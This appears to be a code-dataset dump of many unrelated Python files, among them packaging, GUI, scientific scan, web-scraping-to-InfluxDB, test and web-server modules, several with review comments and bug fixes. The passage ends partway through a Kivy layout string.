text stringlengths 38 1.54M |
|---|
from setuptools import setup, find_packages
# Package metadata for the Canvas console application.
setup(
    name='Canvas',
    version='0.1.0',
    description='',  # TODO: fill in before publishing
    long_description='',
    author='Robert Cudmore',
    author_email='robert.cudmore@gmail.com',
    # NOTE(review): url points at the bImPy repo while the package is named
    # Canvas — confirm which project this setup.py belongs to.
    url='https://github.com/cudmore/bImPy',
    keywords=['in vivo', 'two photon', 'laser scanning microscopy'],
    packages=find_packages(),
    entry_points={
        'console_scripts': [
            'canvas=canvas.bCanvasApp:main',
        ]
    },
    install_requires=[
        'opencv-python-headless',
        'pyserial'
    ],
    extras_require={
        # NOTE(review): 'bioformata' looks like a typo for 'bioformats';
        # changing it would change the `pip install Canvas[...]` extra name,
        # so it is only flagged here.
        'bioformata': ['python-bioformats', 'javabridge'],
    }
)
'''
numpy
PyQt5
QtPy
napari
matplotlib
tifffile
scikit-image
h5py
skan # skeleton tracing (requires numba and pandas)
numba
pandas
PyQtGraph
qdarkstyle
'''
|
import logging
import subprocess
logger = logging.getLogger()
def compile_video(photos_dir, output_filename, photos_per_second=4, photos_extension=None):
photos_extension = 'png' if photos_extension is None else photos_extension
logger.info('compiling timelapse (photos per second: {photos_per_second})'.format(
photos_per_second=photos_per_second,
))
# TODO ensure output_filename ends with .mp4
photos_pattern = '{}/image%05d.{}'.format(photos_dir, photos_extension)
try:
subprocess.check_call([
'ffmpeg',
'-loglevel', 'warning',
'-framerate', str(photos_per_second),
'-i', photos_pattern,
'-c:v', 'libx264',
'-s:v', '4k',
'-r', '30',
'-pix_fmt', 'yuv420p',
output_filename,
])
except subprocess.CalledProcessError as error:
logger.error('Error encountered while generating video using ffmpeg', exc_info=True)
|
from LinkedList import LinkedList
class KthToLastElement:
    """Find the k-th element counted from the end of a singly linked list."""

    def kthlast(self, k, h):
        """Return the data of the k-th node from the tail of *h*.

        :param k: 1-based position counted from the tail.
        :param h: linked list exposing ``head`` and ``length()``.
        :return: node data, or -1 when k is out of range (error-code return
            kept from the original contract).
        """
        # BUG fix: the original only rejected k > length; k <= 0 walked past
        # the last node and raised AttributeError on None.next/None.data.
        if k <= 0 or k > h.length():
            return -1
        node = h.head
        for _ in range(h.length() - k):
            node = node.next
        return node.data
# Demo: build a list from 1..7 and print the 7th element from the end.
# Which end is the head depends on LinkedList.add (append vs prepend) —
# not visible here, so the printed value is not asserted.
o = LinkedList()
o.add(1)
o.add(2)
o.add(3)
o.add(4)
o.add(5)
o.add(6)
o.add(7)
res= KthToLastElement().kthlast(7,o)
print(res)
def main():
    """Read n from stdin and print an n-row triangle: row r is '1 2 ... r '."""
    row_count = int(input())
    for row in range(1, row_count + 1):
        # end=" \n" reproduces the original trailing space before the newline.
        print(*range(1, row + 1), end=" \n")


if __name__ == "__main__":
    main()
|
import tkinter
from tkinter import messagebox
from tkinter.ttk import Combobox
from vanderpolgenerator import VanDerPolGenerator
from plot import Plot
import re
import sys
class GUI(tkinter.Tk):
    """Main window: collects Van der Pol parameters and plots solutions."""

    def __init__(self,):
        tkinter.Tk.__init__(self)
        self.title('Van der Pol Generator Visualizer v1.0')
        self.geometry('800x450')
        self.colors = self.get_colors()
        # --- equation parameters (l, m) ---
        self.parameters_label = tkinter.Label(self, text='Parameters', font=("Arial", 16))
        self.parameters_label.place(x=20, y=17)
        self.l_parameter_label = tkinter.Label(self, text='l = ', font=('Times New Roman', 13, 'italic'))
        self.l_parameter_label.place(x=20, y=60)
        self.l_parameter_entry = tkinter.Entry(self)
        self.l_parameter_entry.config(width=8)
        self.l_parameter_entry.place(x=60, y=63)
        self.m_parameter_label = tkinter.Label(self, text='m = ', font=('Times New Roman', 13, 'italic'))
        self.m_parameter_label.place(x=20, y=90)
        self.m_parameter_entry = tkinter.Entry(self)
        self.m_parameter_entry.config(width=8)
        self.m_parameter_entry.place(x=60, y=93)
        # --- initial conditions and integration settings ---
        self.start_x_label = tkinter.Label(self, text='Start X = ', font=('Arial', 11))
        self.start_x_label.place(x=20, y=160)
        self.start_x_entry = tkinter.Entry(self)
        self.start_x_entry.config(width=8)
        self.start_x_entry.insert(0, '0.0')
        self.start_x_entry.place(x=90, y=163)
        self.start_y_label = tkinter.Label(self, text='Start Y = ', font=('Arial', 11))
        self.start_y_label.place(x=20, y=180)
        self.start_y_entry = tkinter.Entry(self)
        self.start_y_entry.config(width=8)
        self.start_y_entry.insert(0, '0.1')
        self.start_y_entry.place(x=90, y=183)
        self.h_label = tkinter.Label(self, text='h = ', font=('Arial', 11))
        self.h_label.place(x=180, y=160)
        self.steps_label = tkinter.Label(self, text='Steps = ', font=('Arial', 11))
        self.steps_label.place(x=180, y=180)
        self.h_entry = tkinter.Entry(self)
        self.h_entry.config(width=8)
        self.h_entry.insert(0, '0.01')
        self.h_entry.place(x=210, y=163)
        self.steps_entry = tkinter.Entry(self)
        self.steps_entry.config(width=8)
        self.steps_entry.insert(0, '10000')
        self.steps_entry.place(x=240, y=183)
        # --- curve color, action buttons, plot and curve list ---
        self.color_label = tkinter.Label(self, text='Color', font=('Arial', 11))
        self.color_label.place(x=20, y=240)
        self.color_box = Combobox(self, values=self.colors)
        self.color_box.set('Black')
        self.color_box.place(x=20, y=265)
        self.add_button = tkinter.Button(self, text='Add', font=('Arial', 13), width=10, command=self.add_graphic)
        self.add_button.place(x=220, y=260)
        self.show_button = tkinter.Button(self, text='SHOW', font=('Arial', 14), width=15, height=2, command=self.show)
        self.show_button.place(x=300, y=350)
        self.plot = Plot()
        self.info_labels = tkinter.Listbox(self, selectmode='MULTIPLE', width=60, height=17)
        self.info_labels.bind('<<ListboxSelect>>', self.on_select)
        self.info_labels.place(x=420, y=20)

    def on_select(self, event):
        """Remove the selected curve from both the plot and the listbox."""
        selected = event.widget.curselection()
        if not selected:
            return
        num = selected[0]
        # BUG fix: the original always removed plot index 0 while deleting the
        # selected listbox row, desynchronizing the plot from the list.
        self.plot.remove(num)
        self.info_labels.delete(num)

    def show(self):
        """Render all added curves."""
        self.plot.draw()

    def get_values(self):
        """Read and validate all entries.

        :return: (l, m, (start_x, start_y), h, steps, color) or None on
            invalid input (an error dialog is shown).
        """
        try:
            l_parameter = float(self.l_parameter_entry.get())
        except ValueError:
            self.show_error('l parameter is invalid')
            return
        try:
            m_parameter = float(self.m_parameter_entry.get())
        except ValueError:
            self.show_error('m parameter is invalid')
            return
        try:
            # BUG fix: these four fields were previously unvalidated, so a bad
            # value raised an uncaught ValueError instead of showing a dialog.
            start_x = float(self.start_x_entry.get())
            start_y = float(self.start_y_entry.get())
            h = float(self.h_entry.get())
            steps = int(self.steps_entry.get())
        except ValueError:
            self.show_error('start point, h or steps value is invalid')
            return
        color = self.color_box.get()
        # raw string: '\s' in a plain string is an invalid escape; r'\s+'
        # strips all whitespace from the color name as intended.
        color = re.sub(r'\s+', '', color)
        return l_parameter, m_parameter, (start_x, start_y), h, steps, color

    def add_graphic(self):
        """Build a generator from the entries and add its curve to the plot."""
        values = self.get_values()
        if not values:
            return
        l, m, start, h, steps, color = values
        try:
            generator = VanDerPolGenerator(l, m, start, h, steps)
            self.plot.add(generator, color)
            self.info_labels.insert('end', self.plot.str(-1))
        except Exception as error:
            # Was a bare except that showed only the exception *type*
            # (sys.exc_info()[0]); show the message instead.
            self.show_error(str(error))

    def show_error(self, description):
        """Pop a modal error dialog."""
        messagebox.showerror('Error', description)

    def get_colors(self):
        """Load color names from all_colors.txt, one name per line."""
        # BUG fix: the original did color.replace('\s', ''), which removes the
        # literal two-character sequence backslash-s — entries kept their
        # trailing newlines. strip() removes real whitespace. The file is now
        # also closed via a context manager even on error.
        with open('all_colors.txt') as file:
            return [color.strip() for color in file.readlines()]
# Launch the visualizer when run as a script.
if __name__ == "__main__":
    app = GUI()
    app.mainloop()
|
# -*- coding: utf-8 -*-
"""
lantz.ui.scan
~~~~~~~~~~~~~
A Scan frontend and Backend. Requires scan.ui
:copyright: 2015 by Lantz Authors, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import time
import math
from enum import IntEnum
from lantz.utils.qt import QtCore, QtGui
from lantz.ui.app import Frontend, Backend, start_gui_app
def _linspace_args(start, stop, step_size=None, length=None):
"""Return the step_size and length for a given linspace
where step_size OR length is defined.
"""
if step_size is None:
if length is None:
length = 10
step_size = (stop - start) / (length + 1)
else:
if length is not None:
raise ValueError('step_size and length cannot be both different from None')
length = math.floor((stop - start) / step_size) + 1
return step_size, length
def _linspace(start, stop, step_size=None, length=None):
    """Yield evenly spaced values from *start* with a fixed step_size OR a
    fixed length (see :func:`_linspace_args`)."""
    step, count = _linspace_args(start, stop, step_size, length)
    for idx in range(count):
        yield start + idx * step
class StepsMode(IntEnum):
    """Step calculation modes.

    Values match the index order of the mode combobox in scan.ui.
    """
    #: fixed step size.
    step_size = 0
    #: fixed step count.
    step_count = 1
class Scan(Backend):
    """A backend that iterates over a list of values,
    calling a `body` function in each step.
    """

    #: Signal emitted before starting a new iteration
    #: Parameters: loop counter, step value, overrun
    iteration = QtCore.Signal(int, int, bool)

    #: Signal emitted when the loop finished.
    #: The parameter is used to inform if the loop was canceled.
    loop_done = QtCore.Signal(bool)

    #: The function to be called. It requires three parameters.
    #:    counter - the iteration number.
    #:    current value - the current value of the scan.
    #:    overrun - a boolean indicating if the time required for the operation
    #:              is longer than the interval.
    #: :type: (int, int, bool) -> None
    body = None

    #: To be called before the body. Same signature as body
    _pre_body = None

    #: To be called after the body. Same signature as body
    _post_body = None

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Cooperative cancellation flag, checked at the start of every step.
        self._active = False
        self._internal_func = None

    def stop(self):
        """Request the scanning to be stopped.
        Will stop when the current iteration is finished.
        """
        self._active = False

    def start(self, body, interval=0, steps=(), timeout=0):
        """Request the scanning to be started.

        :param body: function to be called at each iteration.
                     If None, the class body will be used.
        :param interval: interval between starts of the iteration.
                         If the body takes too long, the iteration will
                         be as fast as possible and the overrun flag will be True
        :param steps: iterable
        :param timeout: total time in seconds that the scanning will take.
                        If overdue, the scanning will be stopped.
                        If 0, there is no timeout.
        """
        self._active = True
        body = body or self.body
        iterations = len(steps)

        # Each step re-schedules itself on the Qt event loop with
        # QTimer.singleShot, keeping the GUI responsive between steps.
        def internal(counter, overrun=False, schedule=QtCore.QTimer.singleShot):
            if not self._active:
                self.loop_done.emit(True)
                return
            st = time.time()
            self.iteration.emit(counter, iterations, overrun)
            if self._pre_body is not None:
                self._pre_body(counter, steps[counter], overrun)
            if body is not None:
                body(counter, steps[counter], overrun)
            if self._post_body is not None:
                self._post_body(counter, steps[counter], overrun)
            if iterations and counter + 1 == iterations:
                # Last step completed normally.
                self._active = False
                self.loop_done.emit(False)
                return
            elif not self._active:
                # stop() was called while the body ran.
                self.loop_done.emit(True)
                return
            # Schedule the next step; a negative remainder means the body
            # overran the interval, which is reported via the overrun flag.
            sleep = interval - (time.time() - st)
            schedule(sleep * 1000 if sleep > 0 else 0,
                     lambda: self._internal_func(counter + 1, sleep < 0))

        self._internal_func = internal
        if timeout:
            QtCore.QTimer.singleShot(timeout * 1000, self.stop)
        QtCore.QTimer.singleShot(0, lambda: self._internal_func(0))
class ScanUi(Frontend):
    """A frontend to the Scan backend.
    Allows you to create a linear sequence of steps between a start and a stop,
    with selectable step size or number of steps.
    """

    gui = 'scan.ui'

    auto_connect = False

    #: Signal emitted when a start is requested.
    #: The parameters are None, interval, vector of steps
    request_start = QtCore.Signal(object, object, object)

    #: Signal emitted when a stop is requested.
    request_stop = QtCore.Signal()

    def connect_backend(self):
        """Wire widget events to handlers and backend signals to the UI."""
        super().connect_backend()
        self.widget.start_stop.clicked.connect(self.on_start_stop_clicked)
        self.widget.mode.currentIndexChanged.connect(self.on_mode_changed)
        self.widget.step_count.valueChanged.connect(self.recalculate)
        self.widget.start.valueChanged.connect(self.recalculate)
        self.widget.stop.valueChanged.connect(self.recalculate)
        self.widget.step_size.valueChanged.connect(self.recalculate)
        self.widget.progress_bar.setValue(0)
        # Two palettes for the progress bar: normal, and red for overruns.
        self._ok_palette = QtGui.QPalette(self.widget.progress_bar.palette())
        self._overrun_palette = QtGui.QPalette(self.widget.progress_bar.palette())
        self._overrun_palette.setColor(QtGui.QPalette.Highlight,
                                       QtGui.QColor(QtCore.Qt.red))
        self.backend.iteration.connect(self.on_iteration)
        self.backend.loop_done.connect(self.on_loop_done)
        self.request_start.connect(self.backend.start)
        self.request_stop.connect(self.backend.stop)

    def on_start_stop_clicked(self, value=None):
        """Toggle: request a stop when running, otherwise start a new scan."""
        if self.backend._active:
            self.widget.start_stop.setText('...')
            self.widget.start_stop.setEnabled(False)
            self.request_stop.emit()
            return
        self.widget.start_stop.setText('Stop')
        self.widget.start_stop.setChecked(True)
        vals = [getattr(self.widget, name).value()
                for name in 'start stop step_size step_count wait'.split()]
        start, stop, step_size, step_count, interval = vals
        # step_size is always in sync with step_count via recalculate(), so
        # only step_size is passed here regardless of the selected mode.
        steps = list(_linspace(start, stop, step_size))
        self.request_start.emit(None, interval, steps)

    def recalculate(self, *args):
        """Keep step_size and step_count consistent with the current mode."""
        mode = self.widget.mode.currentIndex()
        if mode == StepsMode.step_size:
            step_size, length = _linspace_args(self.widget.start.value(),
                                               self.widget.stop.value(),
                                               self.widget.step_size.value())
            self.widget.step_count.setValue(length)
        elif mode == StepsMode.step_count:
            step_size, length = _linspace_args(self.widget.start.value(),
                                               self.widget.stop.value(),
                                               length=self.widget.step_count.value())
            self.widget.step_size.setValue(step_size)

    def on_iteration(self, counter, iterations, overrun):
        """Advance the progress bar; color it red while overrunning."""
        pbar = self.widget.progress_bar
        if not counter:
            # First iteration: size the bar (0 maximum = busy indicator).
            if iterations:
                pbar.setMaximum(iterations + 1)
            else:
                pbar.setMaximum(0)
        if iterations:
            pbar.setValue(counter + 1)
        if overrun:
            pbar.setPalette(self._overrun_palette)
        else:
            pbar.setPalette(self._ok_palette)

    def on_mode_changed(self, new_index):
        """Enable the entry that drives the other one in the selected mode."""
        if new_index == StepsMode.step_size:
            self.widget.step_count.setEnabled(False)
            self.widget.step_size.setEnabled(True)
        elif new_index == StepsMode.step_count:
            self.widget.step_count.setEnabled(True)
            self.widget.step_size.setEnabled(False)
        self.recalculate()

    def on_loop_done(self, cancelled):
        """Reset the start/stop button and complete the progress bar."""
        self.widget.start_stop.setText('Start')
        self.widget.start_stop.setEnabled(True)
        self.widget.start_stop.setChecked(False)
        if self.widget.progress_bar.maximum():
            self.widget.progress_bar.setValue(self.widget.progress_bar.maximum())
        else:
            # Busy-indicator mode: give the bar a maximum so it shows "full".
            self.widget.progress_bar.setMaximum(1)
# Manual demo: run a Scan backend whose body just prints each step.
if __name__ == '__main__':
    def func(current, total, overrun):
        print('func', current, total, overrun)

    app = Scan()
    app.body = func
    start_gui_app(app, ScanUi)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.24 on 2020-01-29 12:51
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: redefines favourites.id as a standard auto PK.

    Generated code — keep byte-stable; do not hand-edit field definitions.
    """

    dependencies = [
        ('favourites', '0002_auto_20200123_1700'),
    ]

    operations = [
        migrations.AlterField(
            model_name='favourites',
            name='id',
            field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
        ),
    ]
|
# (Earlier experiments, kept commented out in the original:)
# print("Ahmeeada".strip("A"))
# imelde="more mayhem","Imelda May","2011",((1,"pulling the Rug"),(2,"psycho"),(3,"mayhem"),(4,"Kentisch town waltz"))
# print(imelde)
# with open("imelda3txt",'w')as inzwischen:
#     print(imelde,file=inzwischen)

import ast

# Read back the tuple repr that was previously written with print(tuple, file=...).
with open("imelda3.txt", 'r') as inZwischen:
    content = inZwischen.readline()
print(content)
# SECURITY fix: ast.literal_eval parses Python literals only and, unlike
# eval(), cannot execute arbitrary code found in the file.
Aha = ast.literal_eval(content)
print(Aha)
# BUG fix: unpack the parsed tuple (Aha), not the raw string `content` —
# unpacking the string raised ValueError (or yielded single characters).
title, artist, year, track = Aha
print(title)
print(artist)
print(year)
print(track)
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import time as tm
import datetime as dtm
import os
def ensureDir(f):
    """Create the directory portion of path *f* if it does not exist yet.

    Note: os.path.dirname() is used, so *f* must end with a separator for the
    full path itself to be created.
    """
    d = os.path.dirname(f)
    if not os.path.exists(d):
        os.makedirs(d)


mainInDir = "C:/Users/jzhao/Documents/Python Scripts/MS/01_DescriptiveStats/01_Data/"
# Timestamped per-run output directory under ./Results/.
mainTimeStamp = dtm.datetime.fromtimestamp(tm.time()).strftime('%Y.%m.%d.%H.%M.%S')
mainOutDir = "./Results/" + mainTimeStamp + "/"
# BUG fix: ensureDir() was called *before* its definition, raising NameError
# at import time; the function is now defined above its first use.
ensureDir(mainOutDir)
|
import json
import logging
import time
from datetime import datetime
import requests
from influxdb import InfluxDBClient
logging.basicConfig(filename="my_app2.log", level=logging.INFO)
def return_count():
    """Fetch the occupancy widget page and parse its inline JS data object.

    :return: dict mapping centre name -> {'count': ..., 'capacity': ...}.
    """
    headers = {"Content-Type": "application/json"}
    url = "https://portal.rockgympro.com/portal/public/a67951f8b19504c3fd14ef92ef27454d/occupancy?&iframeid=occupancyCounter&fId=1784"
    # BUG fix: the dict was being sent as the request *body* (data=headers);
    # it is meant to be sent as the request headers.
    r = requests.get(url, headers=headers)
    # Scrape the JS `data = { ... };` object out of the page source.
    # NOTE(review): this index arithmetic is tightly coupled to the page's
    # exact formatting (spaces, trailing comma) — fragile by design.
    txt = r.text.replace("\n", "").replace("\\", "")
    start_index = txt.find("data") + 6
    end_index = txt[start_index:].find("};") + start_index - 1
    subset = txt[start_index:end_index].replace("'", '"').replace(" ", "")
    subset = subset[:-1] + "}"
    # Convert to json
    res_json = json.loads(subset)
    return res_json
def main():
    """Poll the occupancy endpoint every 5 minutes and store counts in InfluxDB.

    Runs forever; every exception is logged (with traceback) and the loop
    continues on the next cycle.
    """
    # Create the client once — the original re-created an InfluxDBClient for
    # every centre on every polling cycle.
    client = InfluxDBClient("localhost", 8086, database="ravensdb")
    while True:
        try:
            logging.info("Running extraction...")
            res = return_count()
            for centre in res:
                vals = res[centre]
                current = float(vals["count"])
                cap = float(vals["capacity"])
                cur_time = str(datetime.utcnow())
                json_body = [
                    {
                        "measurement": "climbers",
                        "time": cur_time,
                        "tags": {"centre": centre},
                        "fields": {"value": current, "capacity": cap},
                    }
                ]
                client.write_points(json_body)
            # NOTE(review): `current` is the last centre's value and is
            # undefined if `res` is empty — kept from the original.
            logging.info("Finished extraction, found %s climbers. Sleeping...", current)
            time.sleep(300)
        except Exception as e:
            logging.exception(e)


if __name__ == "__main__":
    main()
|
# Report whether the two sample lists have the same number of elements.
list1 = [1, 2, 3, 4, 5, 6]
list2 = [9, 8, 7, 6, 3, 5]
len1 = len(list1)
len2 = len(list2)
message = ('both list have equal length'
           if len1 == len2
           else 'both list doesnt have equal length')
print(message)
|
from math import sqrt
def pearson_distance(v1, v2):
    """
    Calculate Pearson-correlation distance between v1 and v2.

    Vectors of unequal length are truncated to their common length.

    :param v1: numeric sequence
    :param v2: numeric sequence
    :return: float in [0, 2]: ~0 for perfectly correlated inputs, 2 for
        perfectly anti-correlated ones, and 1 when the correlation is
        undefined (zero variance or empty input).
    """
    n = min(len(v1), len(v2))
    if n == 0:
        return 1  # no data -> no correlation information (avoids ZeroDivisionError)
    # BUG fix: the original mixed len(v1) and min_length in the formula,
    # producing wrong results for unequal-length inputs; truncate both
    # vectors up front and use n consistently.
    v1, v2 = v1[:n], v2[:n]
    # Simple sums
    sum1, sum2 = sum(v1), sum(v2)
    # Sums of the squares
    sum1_square = sum(v * v for v in v1)
    sum2_square = sum(v * v for v in v2)
    # Sum of the products
    product_sum = sum(a * b for a, b in zip(v1, v2))
    # Pearson score: covariance over the product of standard deviations.
    num = product_sum - (sum1 * sum2 / n)
    den = sqrt((sum1_square - sum1 ** 2 / n) * (sum2_square - sum2 ** 2 / n))
    if den == 0:
        return 1
    return 1.0 - num / den
|
#!/usr/bin/env python3
"""tests for dna.py"""
import os
import random
import re
import string
from subprocess import getstatusoutput, getoutput
# Path of the script under test; all tests shell out to it.
prg = './dna.py'


# --------------------------------------------------
def test_exists():
    """exists"""
    assert os.path.isfile(prg)


# --------------------------------------------------
def test_no_arg_and_usage():
    """Program prints a usage message with no args and with help flags."""
    for flag in ('', '-h', '--help'):
        assert getoutput(f'{prg} {flag}').lower().startswith('usage')
# --------------------------------------------------
def run_single(base):
    """Run dna.py on a random-length homopolymer of *base* and check output."""
    num = random.randint(1, 10)
    rv, out = getstatusoutput(f'{prg} {base * num}')
    assert rv == 0
    # Expected counts in A C G T column order.
    counts = {'A': (num, 0, 0, 0),
              'C': (0, num, 0, 0),
              'G': (0, 0, num, 0),
              'T': (0, 0, 0, num)}[base.upper()]
    assert out == ' '.join(str(c) for c in counts)
# --------------------------------------------------
# One smoke test per base, in upper- and lower-case, all via run_single().
def test_a_upper():
    """A"""
    run_single('A')


# --------------------------------------------------
def test_a_lower():
    """a"""
    run_single('a')


# --------------------------------------------------
def test_c_upper():
    """C"""
    run_single('C')


# --------------------------------------------------
def test_c_lower():
    """c"""
    run_single('c')


# --------------------------------------------------
def test_g_upper():
    """G"""
    run_single('G')


# --------------------------------------------------
def test_g_lower():
    """g"""
    run_single('g')


# --------------------------------------------------
def test_t_upper():
    """T"""
    run_single('T')


# --------------------------------------------------
def test_t_lower():
    """t"""
    run_single('t')
# --------------------------------------------------
def test_rosalind_example():
    """From http://rosalind.info/problems/dna/"""
    # Known sample input/output pair from the Rosalind DNA problem statement.
    dna = ('AGCTTTTCATTCTGACTGCAACGGGCAATATGTCTCTGTGTGGATT'
           'AAAAAAAGAGTGTCTGATAGCAGC')
    rv, out = getstatusoutput(f'{prg} {dna}')
    assert rv == 0
    assert out == '20 12 17 21'
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import sys
import os
os.putenv('LANG', 'en_US.UTF-8')
os.putenv('LC_ALL', 'en_US.UTF-8')
import socket
from http.server import BaseHTTPRequestHandler, HTTPServer
import time
import json
import requests
import random
import cgi
from scoreSong import init, scoreMp3
# Load the scoring model once at startup (used by every POST request).
model = init()
import youtube_dl

# youtube-dl configuration: extract audio as mp3 into songs/<title>-<id>.mp3.
postprocessors = []
postprocessors.append({
    'key': 'FFmpegExtractAudio',
    'preferredcodec': 'mp3',
    'preferredquality': None,
    'nopostoverwrites': None,
})
ydl_opts = {
    'postprocessors': postprocessors,
    'outtmpl': 'songs/%(title)s-%(id)s.%(ext)s'
}
ydl = youtube_dl.YoutubeDL(ydl_opts)
# Bind on all interfaces, port 5000.
hostName = "0.0.0.0"
hostPort = 5000
class MyServer(BaseHTTPRequestHandler):
    """HTTP endpoint: POST a YouTube URL; the server downloads the audio as
    mp3 (if not cached under songs/), scores it, and returns the filename."""

    def _set_headers(self):
        # Permissive CORS headers so a browser front-end on another origin
        # can POST to this server.
        self.send_response(200, "ok")
        self.send_header('Content-type', 'text/html')
        self.send_header('Access-Control-Allow-Credentials', 'true')
        self.send_header('Access-Control-Allow-Origin', '*')
        self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
        self.send_header("Access-Control-Allow-Headers", "X-Requested-With, Content-type")
        self.end_headers()

    # GET is for clients getting the prediction (currently a stub).
    def do_GET(self):
        self.send_response(200)
        print("TEST")
        #self.wfile.write(bytes("<p>You accessed path: %s</p>" % self.path, "utf-8"))

    # POST is for submitting data.
    def do_POST(self):
        self._set_headers()
        print( "incomming http: ", self.path )
        # Parse the multipart/form body for the "url" field.
        form = cgi.FieldStorage(
            fp=self.rfile,
            headers=self.headers,
            environ={'REQUEST_METHOD': 'POST'})
        url = form.getvalue("url")
        print(url)
        # Resolve video metadata without downloading; sanitize the title for
        # use as a filename (quotes and colons).
        info_dict = ydl.extract_info(url, download=False)
        title = info_dict['title'].replace('"',"'").replace(":"," -")
        mp3fn = title + '-' + info_dict['id']
        if not os.path.exists('songs/' + mp3fn + '.mp3'):
            # Download and score only when not already cached.
            ydl.download([url])
            scoreMp3(mp3fn, model)
        self.wfile.write(json.dumps({"filename":mp3fn}).encode('utf-8'))
        return
# BUG fix: the original had `try: while True: pass / except KeyboardInterrupt`
# *before* the server was created, so execution busy-waited forever and never
# reached HTTPServer below. The dead busy-wait has been removed.
myServer = HTTPServer((hostName, hostPort), MyServer)
print(time.asctime(), "Server Starts - %s:%s" % (hostName, hostPort))
try:
    # serve_forever() blocks until interrupted.
    myServer.serve_forever()
except KeyboardInterrupt:
    pass
myServer.server_close()
print(time.asctime(), "Server Stops - %s:%s" % (hostName, hostPort))
from sklearn.tree import DecisionTreeClassifier
import numpy as np
import tensorflow as tf #내가추가한것
def DecisionTree(csv_path):
    """Train a gini decision tree on a CSV (last column = label) and predict
    the class of the final row.

    :param csv_path: comma-separated numeric file; every column but the last
        is a feature.
    :return: prediction array for the single test sample.
    """
    data = np.loadtxt(csv_path, delimiter=',', dtype=np.float32)
    features = data[:, 0:-1]
    labels = data[:, [-1]]
    # The last row, restricted to its first 20 columns, is the test sample.
    # NOTE(review): assumes exactly 20 features at predict time — confirm.
    sample = np.array([features[len(features) - 1]])[:, 0:20]
    estimator = DecisionTreeClassifier(criterion='gini', max_depth=None, max_leaf_nodes=None, min_samples_split=2, min_samples_leaf=1, max_features=None)
    estimator.fit(features, labels)
    return estimator.predict(sample)
import cherrypy
from ws4py.server.cherrypyserver import WebSocketPlugin, WebSocketTool
from ws4py.websocket import EchoWebSocket
import atexit
# the following 4 lines are suggested in the cherrypy website:
# http://tools.cherrypy.org/wiki/ModWSGI
cherrypy.config.update({'environment': 'embedded'})
if cherrypy.__version__.startswith('3.0') and cherrypy.engine.state == 0:
    # CherryPy 3.0 needs an explicit non-blocking engine start under WSGI.
    cherrypy.engine.start(blocking=False)
    atexit.register(cherrypy.engine.stop)
# initialize the websocket plugin of ws4py
WebSocketPlugin(cherrypy.engine).subscribe()
cherrypy.tools.websocket = WebSocketTool()
# my application
class Root(object):
    """CherryPy application root: a landing page and a websocket mount."""

    def index(self):
        """Plain-text landing page."""
        return 'I work!'
    index.exposed = True

    def ws(self):
        """Placeholder handler for /ws; the websocket tool upgrades the
        connection before this body runs."""
        print('THIS IS NEVER PRINTED :(')
    ws.exposed = True
# registering the websocket
# Route-level config: enable the ws4py tool on /ws with an echo handler.
conf={'/ws':{'tools.websocket.on': True,'tools.websocket.handler_cls': EchoWebSocket}}
import logging
logger = logging.getLogger()
logger.setLevel(logging.INFO)
stream = logging.StreamHandler()
stream.setLevel(logging.INFO)
logger.addHandler(stream)
# lets go!
# WSGI entry point consumed by mod_wsgi / the hosting server.
application = cherrypy.Application(Root(), script_name='', config=conf)
def print_line(char, time):
    """Print a single separator line.

    :param char: character the line is made of
    :param time: number of repetitions
    """
    print(char * time)


def print_lines(char, time, rows=5):
    """Print several separator lines.

    :param char: character each line is made of
    :param time: repetitions per line
    :param rows: number of lines (default 5 — was previously hard-coded,
        now a backward-compatible parameter)
    """
    for _ in range(rows):
        print_line(char, time)
name = "黑马程序员" |
from dialog_api import messaging_pb2
from google.protobuf.wrappers_pb2 import StringValue
from dialog_bot_sdk.entities.media.ImageMedia import ImageLocation
class WebPageMedia:
    """Web-page preview attachment: url, title, description and an optional
    preview image."""

    def __init__(self, url: str, title: str = "", description: str = "", image: ImageLocation = None):
        self.url = url
        self.title = title
        self.description = description
        self.image = image

    def to_api(self) -> messaging_pb2.WebpageMedia:
        """Convert to the gRPC WebpageMedia message (image may be None)."""
        image = self.image.to_api() if self.image is not None else None
        return messaging_pb2.WebpageMedia(url=StringValue(value=self.url), title=StringValue(value=self.title),
                                          description=StringValue(value=self.description), image=image)

    @classmethod
    def from_api(cls, web_page: messaging_pb2.WebpageMedia) -> 'WebPageMedia':
        """Build an instance from the gRPC message.

        NOTE(review): web_page.url/title/description are StringValue wrapper
        messages; presumably ``.value`` should be unwrapped here — confirm
        against the SDK before changing, kept as-is.
        """
        return cls(web_page.url, web_page.title, web_page.description, ImageLocation.from_api(web_page.image))

    def __dict__(self):
        # BUG fix: calling self.image.__dict__() crashed with AttributeError
        # when image was None (it is an optional constructor argument).
        image = self.image.__dict__() if self.image is not None else None
        return {"url": self.url, "title": self.title, "description": self.description, "image": image}

    def __str__(self):
        return "WebPageMedia({})".format(self.__dict__())
|
from kivy_soil.kb_system.compat_widgets.popup import AppPopup
from utils import get_containing_directory, open_directory
from utils import seconds_to_minutes_hours
from media_info import cache as media_cache
from kivy.properties import StringProperty
from kivy.uix.boxlayout import BoxLayout
from kivy_soil.kb_system import keys
from kivy.uix.popup import Popup
from kivy.metrics import dp, cm
from kivy.uix.label import Label
from kivy.lang import Builder
import global_vars as gvars
Builder.load_string('''
#: import ConditionLayout widgets.condition_layout.ConditionLayout
#: import FocusButtonScroller widgets.focus_button.FocusButtonScroller
#: import Clipboard kivy.core.clipboard.Clipboard
<MediaPropertiesDialogText>:
orientation: 'horizontal'
size_hint: 1, None
height: tinput.height
Label:
id: label
size_hint_x: None
width: int(root.width * 0.2)
valign: 'top'
height: tinput.height
text_size: self.size
text: root.t_key
CompatTextInputScroller:
id: tinput
size_hint: None, None
width: int(root.width * 0.8)
text_size: self.width, None
height: self.minimum_height
text_size: self.width, None
text: root.t_value
multiline: True
foreground_color: app.mtheme.text
background_active: ''
background_normal: ''
background_disabled_normal: ''
background_color: (0.3, 0.3, 0.8, 0.15)
<MediaPropertiesDialog>:
size_hint: 0.8, 0.7
title: 'Media properties dialog'
ScrollView:
id: scroller
do_scroll_x: False
BoxLayout:
size_hint: 1, None
height: self.minimum_height
orientation: 'vertical'
spacing: app.mlayout.button_height
GridLayout:
